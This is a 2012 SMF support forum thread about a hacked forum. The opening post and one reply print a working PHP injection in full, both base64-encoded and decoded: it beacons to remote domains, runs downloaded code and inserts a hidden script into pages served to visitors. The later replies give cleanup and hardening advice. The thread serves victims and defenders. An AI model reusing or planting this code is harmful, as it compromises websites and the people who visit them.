Advertisement:
NameCheap

Author Topic: So I just noticed my forum got hacked. (base64_decode)  (Read 3128 times)

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
So I just noticed my forum got hacked. (base64_decode)
« on: April 28, 2012, 08:18:44 PM »
Code: [Select]
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2RpcigkcnopKXskbXo9JHJ6O31lbHNleyRyej0kX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0uIi8ubG9ncy8iO2lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2RpcigkcnopKXskbXo9JHJ6O319ZWxzZXskbXo9JHJ6O319fWVsc2V7JG16PSRyejt9JGJvdD0wOyR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3RyaXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKCR1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlIikpJGJvdD0xOyRtc2llPTA7aWYgKGlzX21zaWVfNzc3KCR1YSkpJG1zaWU9MTskbWFjPTA7aWYgKGlzX21hY183NzcoJHVhKSkkbWFjPTE7aWYgKCgkbXNpZT09MCkmJigkbWFjPT0wKSkkYm90PTE7ICBnbG9iYWwgJF9TRVJWRVI7ICAgICRfU0VSVkVSWydzX3AxJ109JG16OyAgJF9TRVJWRVJbJ3NfYjEnXT0kYm90OyAgJF9TRVJWRVJbJ3NfdDEnXT0xMjAwOyAgJF9TRVJWRVJbJ3NfZDEnXT1iYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwyVnVjekV5TW5wNmVtUmtZWHA2TG1OdmJTOD0nKTsgICRkPSc/ZD0nLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pLiImcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUEhQX1NFTEYiXSkuIiZhPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSk7ICAkX1NFUlZFUlsnc19hMSddPWJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92TDJOdmIzQmxjbXB6ZFhSbU9DNXlkUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19hMiddPWJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92TDI1c2FXNTBhR1YzYjI5a0xtTnZiUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0ibmwucGhwP3A9ZCI7ICB9ICAgICAgc2V0dXBfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgICAgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19iMSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLmdldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3NjcmlwdCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXzc3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZGVjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkpOyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAkc3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKCR0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdGUoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcmV0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAgQEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJGRlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZWRfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJyQxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJuICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));?>This code is inserted in EVERY .php file and then some, lol. It redirects you to malicious websites.

Is there any way to edit it out or do I have to go through every file, manually editing each one of them? >.>

Thanks in advance. What a mess. :'(

Version: SMF 2.0 RC4

Offline Ham Radio

  • Newbie
  • *
  • Posts: 8
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #1 on: April 28, 2012, 09:27:04 PM »
I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't loose anything by deleting all your files. The only thing that you will loose it pictures and avatars, so you can back up those folders, but other then that, delete them all. This happened to me recently, and that is what I did.

Offline Colin

  • Customizer
  • SMF Hero
  • *
  • Posts: 6,715
  • Gender: Male
  • SMF Customizer
    • colinschoen on GitHub
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #2 on: April 29, 2012, 12:01:34 AM »
Yep, this has been happening to many other forums.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Offline ApplianceJunk

  • SMF Hero
  • ******
  • Posts: 3,407
    • ApplianceJunk.com
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #3 on: April 29, 2012, 12:19:51 AM »
I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't loose anything by deleting all your files. The only thing that you will loose it pictures and avatars, so you can back up those folders, but other then that, delete them all. This happened to me recently, and that is what I did.

You would loose any custom work to themes and mods.

Offline SikLiFe

  • Semi-Newbie
  • *
  • Posts: 70
  • Gender: Male
    • DontVisitUs
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #4 on: April 29, 2012, 12:25:20 AM »
Code: [Select]
if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
$content=@trycurl_777($url);
if($content!==false)return $content;
$content=@tryfile_777($url);
if($content!==false)return $content;
$content=@tryfopen_777($url);i
f($content!==false)return $content;
$content=@tryfsockopen_777($url);
if($content!==false)return $content;
$content=@trysocket_777($url);
if($content!==false)return $content;
return '';}  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
curl_setopt ($ch, CURLOPT_HEADER, 0);
$result = curl_exec ($ch);
curl_close($ch);if ($result=="")return false;return $result;}  function tryfile_777($url){if(function_exists('file')===false)return false;
$inc=@file($url);$buf=@implode('',$inc);
if ($buf=="")return false;return $buf;}  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}  function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];$val=get_tds_777($actual1);if ($val=="")$val=get_tds_777($actual2);$f=@fopen($tdsfile,"w");if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];$tdsfile=$dir."log1.txt";if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode("\n",$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER['s_p1']=$mz;  $_SERVER['s_b1']=$bot;  $_SERVER['s_t1']=1200;  $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=');  $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);  $_SERVER['s_a1']=base64_decode('aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw').$d;  $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw').$d;  $_SERVER['s_script']="nl.php?p=d";  }      setup_globals_777();    if(!function_exists('gml_777')){  function gml_777(){    $r_string_777='';
  if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"> </script>';  return $r_string_777;  }  }     

 if(!function_exists('gzdecodeit')){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack('v',substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header('Content-Encoding: none');  $decoded_content=gzdecodeit($content);  if(preg_match('/\<\/body/si',$decoded_content)){  return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start('mrobh');  }  }

sites listed in the above code. do NOT go to these sites, but you may want to report them.

ens122zzzddazz dot com
cooperjsutf8 dot ru/g_load.php
nlinthewood dot com/g_load.php


is there a reason why you haven't upgraded to 2.0.2?
It looks like it's creating a directory somewhere, maybe a shell in one of your folders.
« Last Edit: April 29, 2012, 12:44:39 AM by SikLiFe »
A great breakfast is always the right answer.

Offline checkmater

  • Semi-Newbie
  • *
  • Posts: 51
    • Hire web developers
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #5 on: April 29, 2012, 12:27:59 AM »
I think you can just download all of your files and use any editing software (like dreamweaver) searching that line and replacing it with nothig (Dreamweaver can look in every file for the line and replace it autosaving the changes, very easy to do), but I suggest you to do an upgrade to the latest version.

Greetings!
SMF, other software developing and some other stuff on my website, you can also hire someone at myFreelancing website . xD

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #6 on: April 29, 2012, 09:16:29 AM »
You could restore your latest backup...

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #7 on: April 29, 2012, 11:22:09 AM »
So I erased that code from some php files, browsed through the whole board and everything seems to be working fine, no redirects so far.

http://sitecheck.sucuri.net/scanner/ This site was reporting my board as infected, not anymore. Now waiting for Google Webmaster to give me an update. Problem is, many php files still have that line.

Also, I noticed a few files have "666" permission (index.php~, ssi_examples.php~, SSI.php~), I did some search and apparently this is not a problem?

Changed all my passwords and decided to not store any login info on FileZilla.

is there a reason why you haven't upgraded to 2.0.2?
I'm not really familiar with such things, so I'm kinda scared of updating.

I think you can just download all of your files and use any editing software (like dreamweaver) searching that line and replacing it with nothig (Dreamweaver can look in every file for the line and replace it autosaving the changes, very easy to do), but I suggest you to do an upgrade to the latest version.

Greetings!
This just might be the solution, not really the best but I'll try, thanks!

Yep, this has been happening to many other forums.
Including Wordpress, but now they have a script that erases the malicious line from all php files. I noticed SMF released a similar fix in the past. (can't find the link now, meh)

You would loose any custom work to themes and mods.
This. And I have four themes with tweaks here and there. :/ Yet another reason why I don't want to update.

You could restore your latest backup...

MrPhil

  • Guest
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #8 on: April 29, 2012, 12:26:55 PM »
Do NOT use Dreamweaver to edit PHP code. It's very easy to get tangled up in the wrong mode, or not be aware of stuff that DW is doing behind your back. Learn to use a standard code editor (flat text file editor) such as ViM or Notepad++, and an FTP client such as Filezilla to upload and download. Your hosting service's control panel > file manager should have a built-in simple editor, which should be adequate for the purpose. It's probably easiest just to do it manually, file by file. As there are a number of different attacks that have been used against SMF files, it's probably not worth trying to write a general utility.

Do NOT overwrite your files with a fresh copy (Large Update) unless you don't mind losing all mods and themes. This will not wipe out your avatars and attachments. Restoring a backup will often lose recent avatars and attachments, but if you know how the restore works, it might do the job for you (especially if you limit it to restoring .php files).

After getting cleaned up, you have two tasks:
  • Make sure you do not have any unaccounted-for files hanging around that might be back doors or Trojans, that a hacker uses to gain entry. If in doubt, rename it and see if your forum still works right.
  • Find out how the hacker got in. You're a bit back-level on your SMF version, so it's possible the hacker exploited some known security hole in that version. Look at your site access logs, and consult with your host. Just for extra safety, scan all PCs used to administer your site for spyware (especially keystroke loggers and password sniffers), turn on their firewalls, and change all passwords (site access, FTP, admin account, maybe even the database).

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #9 on: April 29, 2012, 03:20:43 PM »
If it helps, I got this hack, ages ago.

I used Textpad and I used the macro thingy, with that, along with an "autoit" script, to edit each file, without all that tedious loading/editing/saving crap.

Sadly, I deleted the script and the macro. Should be easy enough to work out, though.

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #10 on: May 02, 2012, 05:40:35 PM »
Yeah, like I said I don't know how to work around these things, the hell is a macro? LOL I could try to learn about it but it's not as simple as tweaking SMF themes. So... I think I'll have to edit file bye file, oh Lord.

Time to pump my Girls Generation discography and get my hands dirt.

I just hope I can fix everything, I'll be on the lookout for any suspicious file, thanks.

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #11 on: May 03, 2012, 06:39:28 AM »
A macro is something you kinda "program" the text-editor to do. So, in this example, I'd get it to:

START Find the section with the rogue code in.
Delete that section of code.
Save the file.
Load the next file.
Goto START

Kinda thing.

Offline kachan64

  • Semi-Newbie
  • *
  • Posts: 35
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #12 on: May 03, 2012, 06:57:48 AM »
I would recommended TextPad.

Download all your files and then edit it with TextPad, after save the files you've edited and then upload to the server again.
Looks like someone's been doing some injection to your site.

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #13 on: May 06, 2012, 12:32:29 PM »
So I think I'm done fixing everything, found some strange files, kinda makes me worried because I'm reading some lines refering to my (?) database, and this is something I know NOTHING about.

Did a Google search and one of the most suspicious file is exactly (?) like this one:

http://test.mare.qbfreak.net/bin/viewfile/TWiki/PatternSkinCssCookbookCenterPage?rev=;filename=wp-fika.php (safe to click?)

I'm not going to upload my file because it's huge and I'm not sure if it has login info.

And now I have one question! Should I use the Forum Maintenance > Empty Cache tool?

I would recommended TextPad.

Download all your files and then edit it with TextPad, after save the files you've edited and then upload to the server again.
Looks like someone's been doing some injection to your site.
Thanks, great program and really easy to use.

Offline Storman™

  • Support Specialist
  • SMF Hero
  • *
  • Posts: 2,026
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #14 on: May 06, 2012, 01:06:33 PM »
Quote
And now I have one question! Should I use the Forum Maintenance > Empty Cache tool?

It won't hurt and probably a good idea in the circumstances.

So did you go back to RC4 or did you upgrade in the end ? If still on RC4 then considering doing an upgrade at some point so that you are up to date with security fixes etc.

Oh, and did you change your admin and ftp passwords by the way ?
Any Backup method is bettter than no Backup method....

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #15 on: May 06, 2012, 06:39:58 PM »
It won't hurt and probably a good idea in the circumstances.

So did you go back to RC4 or did you upgrade in the end ? If still on RC4 then considering doing an upgrade at some point so that you are up to date with security fixes etc.

Oh, and did you change your admin and ftp passwords by the way ?
Nope, still running RC4, but I'll read more about the update process soon.

And yes, I did change my passwords, also checked my PC for malwares (found more than few). Now I'm gonna refresh the cache and ask my users for feedback, I hope everything is fixed.

I'll come back as soon as I get some responses. :D

MrPhil

  • Guest
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #16 on: May 06, 2012, 07:28:30 PM »
Remember to change your passwords after you've cleaned out any spyware... you don't want your new password sent to the hacker within seconds of your typing them in! Also enable your PC's firewall if you haven't done so already. That reduces the chances of your passwords being sent out without drawing your attention to the fact.